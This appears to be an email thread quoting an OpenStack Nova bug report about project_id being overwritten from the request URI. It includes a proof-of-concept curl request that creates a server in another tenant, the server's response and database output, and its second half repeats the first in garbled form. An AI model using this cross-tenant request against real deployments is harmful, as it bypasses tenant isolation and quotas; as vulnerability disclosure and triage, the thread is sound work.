> ttx
>
> 1) you still need to be authenticated. The keystone middleware doesn't
> let the request hit the router if you fail to auth.
>
> 2) you can issue any openstack api request against any tenant.
>
> Because most logic in the API uses the context (not the URL) to specify
> the resources you are interacting with (for example list servers uses
> the tenant from the context)
>
> instance_list = self.compute_api.get_all(context,
> search_opts=search_opts)
>
> https://github.com/openstack/nova/blob/master/nova/api/openstack/v2/servers.py#L145
>
> So you can create a server in another project but delete, list, show
> (and most other api calls) will not be able to modify it by via the api.
> This is because the way that the database layer is written is defensive
> - it only lets you access data that your context says you have access
> to.
>
> This is still bad in that it allows creation of resources outside of
> your project (for quota/billing avoidance) and there could be more
> tunnels.
I believe this is incorrect. The broken code actually sets context.project_id = to whatever was in the url, so I think you can list and terminate instances in other projects as well.
>
> 3) only affects if you are the openstack api using keystone (not
> deprecated auth)
>
> It shouldn't affect people who use the default (which is nova's internal
> legacy auth) or who use the ec2 api
legacy auth is also broken afaik, because it will successfully authenticate and then the authentication will be overwritten by the url. EC2 auth shouldn't be affected.
>
> --
> You received this bug notification because you are a member of Nova
> Core, which is subscribed to the bug report.
> https://bugs.launchpad.net/bugs/904072
>
> Title:
> project_id could be overwritten to any value by URI value
>
> Status in OpenStack Compute (Nova):
> Confirmed
>
> Bug description:
> project_id could be overwritten to any value by URI value.
> User can create server on any project (even if it is not exist)
> Quota function will not be working because of this bug. (So This bug is a security vulnerability)
>
> --Test condition
> user : demo (not admin)
> project_id: 2
>
> -- Requeest
> stack@freecloud116:~/devstack$ curl -H "Content-type: application/json" -H "x-auth-token: 8bbdb554-a671-446e-a6c2-07326eeb9ad5" -d '{"server": {"min_count": 1, "flavorRef": "1", "name": "test5", "imageRef": "2", "max_count": 1}}' http://localhost:8774/v1.1/tushar2/servers <-- invalid tenant_id
>
> -- Response
> {"server": {"status": "BUILD", "updated": "2011-12-14T03:06:04Z", "hostId": "", "user_id": "demo", "name": "test5", "links": [{"href": "http://localhost:8774/v1.1/tushar2/servers/7", "rel": "self"}, {"href": "http://localhost:8774/tushar2/servers/7", "rel": "bookmark"}], "addresses": {}, "tenant_id": "tushar2", "image": {"id": "2", "links": [{"href": "http://localhost:8774/tushar2/images/2", "rel": "bookmark"}]}, "created": "2011-12-14T03:06:04Z", "uuid": "5b63c965-8966-4ebc-ae1b-1c1c551a044c", "accessIPv4": "", "accessIPv6": "", "key_name": null, "adminPass": "id8SngCb7xeRq67K", "progress": 0, "flavor": {"id": "1", "links": [{"href": "http://localhost:8774/tushar2/flavors/1", "rel": "bookmark"}]}, "config_drive": "", "id": 7, "metadata": {}}}stack@freecloud116:~/devstack$
>
> -- DB result
> instance with project_id "tushar2" is created
>
> mysql> select id,project_id from instances;
> +----+------------+
> | id | project_id |
> +----+------------+
> | 1 | demo5 |
> | 2 | demo5 |
> | 3 | tushar |
> | 4 | tushar1 |
> | 5 | tushar2 |
> | 6 | tushar2 |
> | 7 | tushar2 |
> +----+------------+
> 7 rows in set (0.00 sec)
>
> --Cause of this bug
> This code set project_id to request object from uri
> https://github.com/openstack/nova/blob/master/nova/api/openstack/v2/__init__.py#L78
>
> Then this code set the project_id to context object
> https://github.com/openstack/nova/blob/master/nova/api/openstack/wsgi.py#L554
>
> To manage notifications about this bug go to:
> https://bugs.launchpad.net/nova/+bug/904072/+subscriptions
Comments below
On Dec 16, 2011, at 1:30 PM, anotherjesse wrote:
> ttx api.get_ all(context, opts=search_ opts) /github. com/openstack/ nova/blob/ master/ nova/api/ openstack/ v2/servers. py#L145
>
> 1) you still need to be authenticated. The keystone middleware doesn't
> let the request hit the router if you fail to auth.
>
> 2) you can issue any openstack api request against any tenant.
>
> Because most logic in the API uses the context (not the URL) to specify
> the resources you are interacting with (for example list servers uses
> the tenant from the context)
>
> instance_list = self.compute_
> search_
>
> https:/
>
> So you can create a server in another project but delete, list, show
> (and most other api calls) will not be able to modify it by via the api.
> This is because the way that the database layer is written is defensive
> - it only lets you access data that your context says you have access
> to.
>
> This is still bad in that it allows creation of resources outside of
> your project (for quota/billing avoidance) and there could be more
> tunnels.
I believe this is incorrect. The broken code actually sets context.project_id = to whatever was in the url, so I think you can list and terminate instances in other projects as well.
>
> 3) only affects if you are the openstack api using keystone (not
> deprecated auth)
>
> It shouldn't affect people who use the default (which is nova's internal
> legacy auth) or who use the ec2 api
legacy auth is also broken afaik, because it will successfully authenticate and then the authentication will be overwritten by the url. EC2 auth shouldn't be affected. /bugs.launchpad .net/bugs/ 904072 116:~/devstack$ curl -H "Content-type: application/json" -H "x-auth-token: 8bbdb554- a671-446e- a6c2-07326eeb9a d5" -d '{"server": {"min_count": 1, "flavorRef": "1", "name": "test5", "imageRef": "2", "max_count": 1}}' http:// localhost: 8774/v1. 1/tushar2/ servers <-- invalid tenant_id 14T03:06: 04Z", "hostId": "", "user_id": "demo", "name": "test5", "links": [{"href": "http:// localhost: 8774/v1. 1/tushar2/ servers/ 7", "rel": "self"}, {"href": "http:// localhost: 8774/tushar2/ servers/ 7", "rel": "bookmark"}], "addresses": {}, "tenant_id": "tushar2", "image": {"id": "2", "links": [{"href": "http:// localhost: 8774/tushar2/ images/ 2", "rel": "bookmark"}]}, "created": "2011-12- 14T03:06: 04Z", "uuid": "5b63c965- 8966-4ebc- ae1b-1c1c551a04 4c", "accessIPv4": "", "accessIPv6": "", "key_name": null, "adminPass": "id8SngCb7xeRq67K", "progress": 0, "flavor": {"id": "1", "links": [{"href": "http:// localhost: 8774/tushar2/ flavors/ 1", "rel": "bookmark"}]}, "config_drive": "", "id": 7, "metadata": {}}}stack@ freecloud116: ~/devstack$ /github. com/openstack/ nova/blob/ master/ nova/api/ openstack/ v2/__init_ _.py#L78 /github. com/openstack/ nova/blob/ master/ nova/api/ openstack/ wsgi.py# L554 /bugs.launchpad .net/nova/ +bug/904072/ +subscriptions
>
> --
> You received this bug notification because you are a member of Nova
> Core, which is subscribed to the bug report.
> https:/
>
> Title:
> project_id could be overwritten to any value by URI value
>
> Status in OpenStack Compute (Nova):
> Confirmed
>
> Bug description:
> project_id could be overwritten to any value by URI value.
> User can create server on any project (even if it is not exist)
> Quota function will not be working because of this bug. (So This bug is a security vulnerability)
>
> --Test condition
> user : demo (not admin)
> project_id: 2
>
> -- Requeest
> stack@freecloud
>
> -- Response
> {"server": {"status": "BUILD", "updated": "2011-12-
>
> -- DB result
> instance with project_id "tushar2" is created
>
> mysql> select id,project_id from instances;
> +----+------------+
> | id | project_id |
> +----+------------+
> | 1 | demo5 |
> | 2 | demo5 |
> | 3 | tushar |
> | 4 | tushar1 |
> | 5 | tushar2 |
> | 6 | tushar2 |
> | 7 | tushar2 |
> +----+------------+
> 7 rows in set (0.00 sec)
>
> --Cause of this bug
> This code set project_id to request object from uri
> https:/
>
> Then this code set the project_id to context object
> https:/
>
> To manage notifications about this bug go to:
> https:/